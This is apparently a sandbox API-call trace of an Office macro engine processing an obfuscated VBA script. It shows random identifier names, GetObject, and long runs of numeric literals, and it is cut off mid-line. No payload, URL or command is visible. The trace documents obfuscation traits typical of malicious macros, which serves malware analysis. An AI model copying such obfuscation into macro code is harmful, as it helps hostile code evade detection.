[0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vABAcQA") returned 0x10463f [0067.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.933] VarI4FromStr (in: strIn="410253335", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] VarI4FromStr (in: strIn="497830016", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LDAAAxQ") returned 0x1080ce [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.933] VarI4FromStr (in: strIn="721510144", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] VarI4FromStr (in: strIn="563328747", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.933] VarI4FromStr (in: strIn="96818260", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] VarI4FromStr (in: strIn="14299083", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.933] VarI4FromStr (in: strIn="769620250", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mAAUBU_") returned 0x10fac8 [0067.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.933] VarI4FromStr (in: strIn="540966046", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tB4cAUQ") returned 0x106403 [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="scoU1x") returned 0x104ab6 [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Z1ZCCx") returned 0x10c81b [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GDABQ4") returned 0x109bfa [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KUGBCA1") returned 0x10f382 [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PAAkcQAc") returned 0x10037d [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NZAQAwDA") returned 0x10200e [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wBcwQCZ") returned 0x106ee5 [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zADwAU") returned 0x104ef4 [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WAUxUA") returned 0x102218 [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="l_A_kcCc") returned 0x10a3ba [0067.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.935] VarI4FromStr (in: strIn="331615855", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KADCCCBc") returned 0x1079f2 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nwBDGX") returned 0x104c2b [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZBwQkxAA") returned 0x10cd78 [0067.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.935] VarI4FromStr (in: strIn="217037721", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] VarI4FromStr (in: strIn="101407765", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] VarI4FromStr (in: strIn="24911789", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] VarI4FromStr (in: strIn="315408155", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] VarI4FromStr (in: strIn="374985692", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZocA1A") returned 0x101163 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hABCAQU") returned 0x106974 [0067.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.935] VarI4FromStr (in: strIn="457171059", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] VarI4FromStr (in: strIn="789301620", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rQGAkD") returned 0x109a49 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.935] VarI4FromStr (in: strIn="809916275", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] VarI4FromStr (in: strIn="687351801", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.935] VarI4FromStr (in: strIn="739487042", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] VarI4FromStr (in: strIn="747113994", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.935] VarI4FromStr (in: strIn="967698476", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uwDXUBDC") returned 0x105e44 [0067.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.935] VarI4FromStr (in: strIn="431177762", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="T1AA_BA") returned 0x106cc1 [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAADUQU") returned 0x1064a4 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="J_wZABQA") returned 0x10e957 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="c4QDAAcQ") returned 0x10722c [0067.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.936] VarI4FromStr (in: strIn="857413316", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GcAUUXGG") returned 0x104c28 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAAUCBZ") returned 0x107eb9 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BUQUxQAG") returned 0x104aba [0067.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.936] VarI4FromStr (in: strIn="76883101", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] VarI4FromStr (in: strIn="768539327", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] VarI4FromStr (in: strIn="735216046", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] VarI4FromStr (in: strIn="4239748", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] VarI4FromStr (in: strIn="833177983", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DZCkZD") returned 0x109ebc [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rXA_AUA") returned 0x10df69 [0067.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.936] VarI4FromStr (in: strIn="484208844", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] VarI4FromStr (in: strIn="453503086", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OcB1w4") returned 0x102b0b [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.936] VarI4FromStr (in: strIn="246731466", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] VarI4FromStr (in: strIn="544005722", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.936] VarI4FromStr (in: strIn="591902911", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] VarI4FromStr (in: strIn="917241531", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.936] VarI4FromStr (in: strIn="367901388", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HxDAoU") returned 0x106457 [0067.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.937] VarI4FromStr (in: strIn="855331388", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HUZBAAcQ") returned 0x101f65 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EQXUxQA") returned 0x10f890 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetObject") returned 0x10c37a [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BwA_BA") returned 0x100598 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="scoU1x") returned 0x104ab6 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QQGZAA") returned 0x100790 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JAC_AU_") returned 0x100ac2 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vAXUAx") returned 0x106059 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="L_BBww") returned 0x103770 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sDxAUBC") returned 0x10baf3 [0067.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.937] VarI4FromStr (in: strIn="508873313", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ukwcAA1A") returned 0x10df10 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="L1ABGA_") returned 0x10b439 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lcQkDAx") returned 0x104e1a [0067.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.937] VarI4FromStr (in: strIn="857349982", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.937] VarI4FromStr (in: strIn="398969621", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.937] VarI4FromStr (in: strIn="596419334", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.937] VarI4FromStr (in: strIn="76049932", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.937] VarI4FromStr (in: strIn="208915146", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PkAAwQ") returned 0x1060fd [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vDXkBw_") returned 0x10c8b3 [0067.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.937] VarI4FromStr (in: strIn="375307592", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] VarI4FromStr (in: strIn="554575269", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ABQkxkC") returned 0x10fdbe [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.938] VarI4FromStr (in: strIn="883927756", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] VarI4FromStr (in: strIn="562792598", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.938] VarI4FromStr (in: strIn="910473792", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] VarI4FromStr (in: strIn="729242839", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.938] VarI4FromStr (in: strIn="783761103", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IB_ADAC") returned 0x10c1f1 [0067.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.938] VarI4FromStr (in: strIn="49968158", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VAcZAU") returned 0x1043e2 [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jQAcAA4U") returned 0x1089d1 [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="awUQxQA") returned 0x109e7c [0067.938] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="RAcAAAAZ", cchCount1=-1, lpString2="awUQxQA", cchCount2=-1) returned 3 [0067.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.938] VarI4FromStr (in: strIn="715456374", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] CExposedStream::Read () returned 0x0 [0067.938] CExposedStream::Read () returned 0x0 [0067.938] VarI4FromStr (in: strIn="261120036", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] VarI4FromStr (in: strIn="449319702", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] VarI4FromStr (in: strIn="3073580", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.938] VarI4FromStr (in: strIn="896546338", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="518993330", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="347760234", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="263790313", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="42632228", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="385403231", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="290042018", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="739347899", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="600563038", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="53143786", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="228471672", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="207594866", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="598846788", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="402202420", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="462219216", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="412532760", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="993639880", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="345108042", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="731111453", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="904418461", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="488885916", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="342177495", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="521974283", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="59172911", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="876148", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="876148", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="151328878", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.939] VarI4FromStr (in: strIn="574191478", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="647633436", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="641818825", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="882960302", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="188935123", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="854948312", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="314313760", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="844814534", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="512811636", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="104419922", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="882988334", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="766247407", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="336403800", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="947766407", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="337112812", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="854522123", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="762225623", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="878468097", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="932242874", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: 